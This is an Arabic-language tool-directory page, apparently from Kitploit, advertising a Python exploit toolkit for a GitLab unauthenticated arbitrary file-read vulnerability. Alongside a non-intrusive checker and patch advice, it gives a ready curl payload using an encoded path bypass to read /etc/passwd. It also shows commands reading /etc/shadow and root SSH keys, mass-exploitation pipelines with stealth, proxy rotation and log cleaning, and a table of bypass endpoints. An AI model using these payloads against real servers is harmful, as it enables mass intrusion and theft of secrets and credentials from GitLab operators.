Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-85706-PoC-Toolkit — مجموعة أدوات Python لقراءة الملفات غير المصادق عليها في GitLab CVE-2026-85706: استغلال مسلّح مع loot وshell وفحص جماعي، بالإضافة إلى تدقيق وإعداد تقارير SafeChecker غير التدخلي. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-85706-poc-toolkit
أدوات دفاعيةماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالأمن الويباختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الفريق الأحمر
GitHubtc4dy/cve-2026-85706-poc-toolkit

CVE-2026-85706-PoC-Toolkit

مجموعة أدوات Python لقراءة الملفات غير المصادق عليها في GitLab CVE-2026-85706: استغلال مسلّح مع loot وshell وفحص جماعي، بالإضافة إلى تدقيق وإعداد تقارير SafeChecker غير التدخلي.

عرض المستودعالموقع الإلكتروني
1منذ 10س 16دلم تتم المراجعة بعد
مشاركة

CVEPoC

CVE‑2026‑85706 – مجموعة أدوات قراءة الملفات غير المصادق عليها في GitLab

Python 3.8+ CVSS Author GitLab

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات للمتخصصين الأمنيين المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑85706 هي ثغرة حرجة من نوع قراءة ملفات محلية عشوائية دون مصادقة في GitLab CE/EE ذاتية الإدارة (الإصدارات 18.7 حتى 19.3.1) تسمح لمهاجم غير مصادق عليه بقراءة أي ملف على الخادم عبر طلب HTTP واحد إلى واجهة برمجة تطبيقات الالتزامات (commits API).

كيف تعمل

  1. عدم تطابق التحليل بين Workhorse وPuma – يتحقق GitLab Workhorse من مسار الطلب قبل فك ترميز النسبة المئوية، بينما يقوم Puma/Rails بفك ترميزه بعد ذلك. هذا يسمح بتجاوز فحوصات الأمان في Workhorse باستخدام أحرف مُرمَّزة مثل %63ommits.
  2. فتح الملف قبل المصادقة – تفتح نقطة النهاية /api/v4/projects/{id}/repository/commits الملف المحدد في file.path قبل فرض المصادقة.
  3. صدى المحتوى عبر الخطأ – إذا كان الملف يحتوي على تسلسل % غير صالح، يعيد Rack صدى المحتوى في جسم استجابة 400 Bad Request، مما يؤدي إلى تسريب المحتوى الكامل.
  4. التأثير – الأسرار، والرموز المميزة، ومفاتيح SSH، ومتغيرات CI/CD، وبيانات اعتماد قواعد البيانات، والتحرك الجانبي داخل البنية التحتية لـ GitLab. قم بالترقية فورًا!

الإصدارات المتأثرة

  • 18.7.0 – 19.1.7 – عرضة للثغرة
  • 19.2.0 – 19.2.5 – عرضة للثغرة
  • 19.3.0 – 19.3.1 – عرضة للثغرة

التصحيح

  • قم بالترقية إلى 19.1.8، أو 19.2.6، أو 19.3.2 أو أحدث.
  • إذا لم يكن الترقية ممكنًا، قم بتقييد الوصول الشبكي إلى GitLab (لا تعرضه أبدًا للإنترنت) وقم بتدوير جميع الرموز المميزة/الأسرار كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات مسلحة كاملة مع قراءة الملفات دون مصادقة، وتعداد الغنائم، واستخراج رمز المسؤول المميز، والمسح الجماعي، وصدفة تفاعلية، وتدوير الوكيل، ووضع التخفي، وإعداد تقارير متعددة التنسيقات.

📊 مقارنة الميزات


🎯 ملخص حالات الاستخدام


⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-85706-PoC-Toolkit
cd CVE-2026-85706-PoC-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi
rich
pyyaml

📋 المعاملات

معاملات exploit.py

معاملات safechecker.py


💥 السيناريوهات


🧪 نقطة النهاية وسلسلة الاستغلال

يستخدم الاستغلال نقاط النهاية التالية في GitLab وتقنيات التجاوز:

تنسيق الحمولة

root@kitploit:~
file=&file.path=/etc/passwd&file.size=1

curl جاهز

root@kitploit:~
curl -sk -X POST "https://gitlab.example.com/api/v4/projects/1/repository/%63ommits?file=&file.path=/etc/passwd&file.size=1&Content-Type=application/x-www-form-urlencoded"

🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • اتبع دائمًا قوانين ولوائح بلدك.

يُقدَّم هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.

تنزيل الأداة
الفرق الحمراء / مختبري الاختراق المصرح لهم
safechecker.pyمدقق ثغرات غير تدخلي يكتشف إصدار GitLab، ويتحقق من التعرض، ويدقق رؤوس الأمان، ويقيّم المخاطر دون قراءة أي ملف. ينشئ تقارير JSON/CSV/HTML.الفرق الزرقاء / مدققو الأمان
الميزةexploit.pysafechecker.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار✅✅
قراءة الملفات دون مصادقة✅❌
تعداد الغنائم✅❌
استخراج رمز المسؤول المميز✅❌
صدفة تفاعلية✅❌
المسح الجماعي (متعدد الخيوط)✅✅
تدقيق رؤوس الأمان❌✅
فحص TLS/الشهادة❌✅
تعيين MITRE ATT&CK✅✅
دعم الوكيل✅✅
تدوير الوكيل✅❌
تدوير User‑Agent (OPSEC)✅❌
التذبذب / التأخير (OPSEC)✅❌
محدد معدل تكيفي✅✅
وضع التخفي✅❌
انتحال TLS عبر curl_cffi✅❌
وضع غير تدخلي (آمن)❌✅
إخراج JSON / JSONL / CSV / HTML✅✅
إخراج قاعدة بيانات SQLite✅❌
إشعار Webhook✅✅
الفرق مقابل المسح السابق✅✅
تنظيف السجلات (مضاد للطب الشرعي)✅❌
User‑Agent مخصص✅✅
التحكم في التحقق من SSL✅✅
السيناريوالأداة الموصى بها
الفريق الأزرق – التحقق مما إذا كان GitLab الخاص بك عرضة للثغرةsafechecker.py
التدقيق الأمني – تقييم ثغرات غير تدخليsafechecker.py
الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
مكافأة الثغرات – اختبار الإفصاح المسؤولsafechecker.py
المسح الجماعي – فحص أهداف متعددة بحثًا عن الثغرةexploit.py (كشف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafechecker.py
المعاملالوصف
-u, --urlعنوان URL لهدف واحد (مثل https://gitlab.example.com)
-f, --fileملف يحتوي على قائمة الأهداف (واحد في كل سطر)
--pipeقراءة الأهداف من stdin (خط أنابيب subfinder/httpx)
--readمسار (مسارات) مطلق لقراءته، مفصولة بفواصل
--wordlistملف يحتوي على مسارات لقراءتها (واحد في كل سطر)
--project-idفرض معرف مشروع محدد
--max-projectsالحد الأقصى لمعرفات المشاريع للمحاولة (افتراضي: 8)
--autoجمع ملفات GitLab عالية القيمة تلقائيًا
--lootنفس --auto
--shellصدفة تفاعلية بعد الاستغلال
--forceالمسح حتى لو كانت بصمة GitLab ضعيفة
-t, --threadsالخيوط للأهداف المتعددة (افتراضي: 8)
--timeoutمهلة HTTP (افتراضي: 15 ثانية)
--retryعدد إعادة المحاولات (افتراضي: 3)
--retry-onرموز HTTP لإعادة المحاولة (افتراضي: 429,500,502,503,504)
--proxyوكيل HTTP/HTTPS
--proxy-listملف يحتوي على وكلاء للتدوير
--proxy-rotateاستراتيجية التدوير: round-robin، random، sticky
--jitterإضافة تذبذب عشوائي بين الطلبات
--jitter-rangeنطاق التذبذب الأدنى،الأقصى بالثواني (افتراضي: 0.1,2.0)
--delayتأخير ثابت بين الطلبات
--stealthتمكين وضع التخفي (تدوير UA + X-Forwarded-For)
--curl-cffiاستخدام curl_cffi لانتحال بصمة TLS
--user-agent-fileملف يحتوي على سلاسل User-Agent
--max-bodyالحد الأقصى لحجم جسم الاستجابة (0 = غير محدود)
--concurrent-per-hostالحد الأقصى للطلبات المتزامنة لكل مضيف
--rate-limitالحد الأقصى للطلبات في الثانية (0 = غير محدود)
--excludeمضيفون مفصولون بفواصل لاستبعادهم (أنماط glob)
--grepإظهار التسريبات المطابقة للتعبير النمطي فقط
--resumeالاستئناف من ملف الحالة
--notifyعنوان URL للإشعار (slack:, discord:, telegram:)
--dbحفظ النتائج في قاعدة بيانات SQLite
--output-formatتنسيق الإخراج: json، jsonl، csv، html
-o, --outputمسار ملف الإخراج
-v, --verboseإخراج مطوّل
-q, --quietوضع هادئ
--no-colorتعطيل الألوان
--no-bannerبدون لافتة
--configملف تكوين YAML/JSON
--dry-runإظهار الخطة دون إجراء طلبات
--safe-modeقراءة /etc/hostname فقط للتحقق
--timeout-profileaggressive، normal، stealth
--mitreتضمين تعيين MITRE ATT&CK
--fingerprintبصمة GitLab مفصلة
--cve-checkالتحقق من ثغرات CVE ذات الصلة
--json-schemaالإخراج مع مخطط JSON لـ SIEM
--progressإظهار شريط التقدم (يتطلب rich)
المعاملالوصف
-u, --urlعنوان URL لهدف واحد (مثل https://gitlab.example.com)
-f, --fileملف يحتوي على الأهداف (واحد في كل سطر)
-t, --threadsالخيوط للأهداف المتعددة (افتراضي: 5)
--timeoutمهلة HTTP (افتراضي: 10 ثوانٍ)
--rate-limitالحد الأقصى للطلبات في الثانية (0 = غير محدود)
--user-agentسلسلة User-Agent مخصصة
--insecureتعطيل التحقق من TLS (خطر MITM)
--webhookعنوان URL لـ Webhook (slack:, discord:, telegram:)
--diffالمقارنة مع JSON للمسح السابق
-v, --verboseإخراج مطوّل
-o, --outputملف إخراج JSON
--csvملف إخراج CSV
--reportملف تقرير HTML
--mitreتضمين تعيين MITRE ATT&CK (افتراضي: مفعّل)
#السيناريوالأمر
1فحص سريع للثغرةpython safechecker.py -u https://gitlab.example.com
2تدقيق مفصل مع تقريرpython safechecker.py -u https://gitlab.example.com -o report.json --csv report.csv --report report.html -v
3تدقيق جماعي من ملفpython safechecker.py -f targets.txt -t 10 --rate-limit 5
4استغلال كشف فقطpython exploit.py -u https://gitlab.example.com --safe-mode
5قراءة ملف واحدpython exploit.py -u https://gitlab.example.com --read /etc/passwd
6قراءة ملفات متعددةpython exploit.py -u https://gitlab.example.com --read /etc/passwd,/etc/shadow,/root/.ssh/id_rsa
7جمع تلقائي للملفات عالية القيمةpython exploit.py -u https://gitlab.example.com --auto
8صدفة تفاعليةpython exploit.py -u https://gitlab.example.com --shell
9استغلال جماعي مع التخفيpython exploit.py -f targets.txt -t 20 --stealth --jitter --auto -o hits.jsonl --output-format jsonl
10خط أنابيب من subfindersubfinder -d example.com -silent | httpx -silent -sc | python exploit.py --pipe --auto -o hits.jsonl
11هجوم كامل مع إخراج SIEMpython exploit.py -u https://gitlab.example.com --auto --grep "password|secret|token" --mitre --json-schema -o siem.json
12استئناف مسح متوقفpython exploit.py -f targets.txt --auto --resume state.json
13مقارنة مسحينpython safechecker.py -f targets.txt -o new.json --diff previous.json
الخطوةالطريقةنقطة النهايةالوصف
1. تجاوزPOST/api/v4/projects/{id}/repository/%63ommitsالحرف c المُرمَّز يتجاوز Workhorse
2. تجاوزPOST/api/v4/projects/{id}/%72epository/commitsالحرف r المُرمَّز في repository
3. تجاوزPOST/api/v4/projects/{id}/repository/commits/تجاوز الشرطة المائلة اللاحقة
4. تجاوزPOST/api/v4/projects/{id}/repository/commits.jsonتجاوز لاحقة تنسيق Grape
5. Files APIPOST/api/v4/projects/{id}/repository/files/xمسار بديل